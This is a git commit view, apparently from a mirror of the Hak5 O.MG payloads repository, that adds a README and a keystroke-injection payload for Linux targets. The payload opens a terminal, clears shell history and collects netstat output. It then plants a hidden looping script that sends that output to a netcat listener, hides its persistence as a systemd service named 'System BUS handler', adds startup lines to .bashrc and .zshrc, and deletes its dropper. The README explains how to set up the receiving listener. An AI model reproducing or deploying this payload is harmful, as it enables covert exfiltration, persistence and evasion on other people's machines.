mirror of https://github.com/hak5/omg-payloads.git
uploading network_surveillance payload
network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.pull/190/head
parent
868962cae9
commit
0981da652b
|
@ -0,0 +1,33 @@
|
||||||
|
## About:
|
||||||
|
* Title: network_surveillance
|
||||||
|
* Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Exfiltaration
|
||||||
|
* Target: Unix-like operating systems with systemd.
|
||||||
|
* Attackmodes: HID.
|
||||||
|
|
||||||
|
## network_surveillance: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
* Exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
|
||||||
|
* Fully Persistent.
|
||||||
|
* Waits for target to get online.
|
||||||
|
* Transfers loot once target is online.
|
||||||
|
* Oneliner payload.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Extracts network information.
|
||||||
|
2. Creating Loot transfer mechanism in targets system.
|
||||||
|
3. Creating local systemd service for persistence.
|
||||||
|
4. Executing Autotart mechanism.
|
||||||
|
|
||||||
|
### Usage:
|
||||||
|
1. Run netcat listner on attacking machine: `nc -lvp <port number> > <output_filename>`
|
||||||
|
2. Example: `nc -lvp 4444 > network_surveillance.txt
|
||||||
|
|
||||||
|
### Changes to be made:
|
||||||
|
* Replace IP address(twice) `0.0.0.0` and Port Number `4444` on line `15`.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,22 @@
|
||||||
|
REM Title: network_surveillance
|
||||||
|
REM Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Exfiltration.
|
||||||
|
REM Target: GNU/Linux.
|
||||||
|
REM Attackmodes: HID.
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 1000
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "#\!/bin/bash\nmkdir -p ~/.config/systemd/user\nmkdir -p /var/tmp/.system\nnetstat -antup >> /tmp/exfil\nnetstat -nlp >> /tmp/exfil\necho -e \"while :\\\ndo\\\n\\\tping -c 5 127.0.0.1\\\n\\\tif [ \\\$? -eq 0 ]; then\\\n\\\t\\\tnc -c 127.0.0.1 4444 < /tmp/exfil\\\n\\\tfi\\\ndone\" > /var/tmp/.system/systemBus\nchmod +x /var/tmp/.system/systemBus\necho -e \"[Unit]\\\nDescription= System BUS handler\\\n\\\n[Service]\\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\\nRestart=on-failure\\\nSuccessExitStatus=3 4\\\nRestartForceExitStatus=3 4\\\n\\\n[Install]\\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\nsystemctl --user enable --now systemBUS.service\nsystemctl --user start --now systemBUS.service\necho -e \"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\\\nfi\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\\\nfi\" > /tmp/tmmmp\nchmod +x /tmp/tmmmp && /tmp/./tmmmp && rm /tmp/tmmmp" > /tmp/system
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/system
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./system && rm /tmp/system && exit
|
||||||
|
ENTER
|
Loading…
Reference in New Issue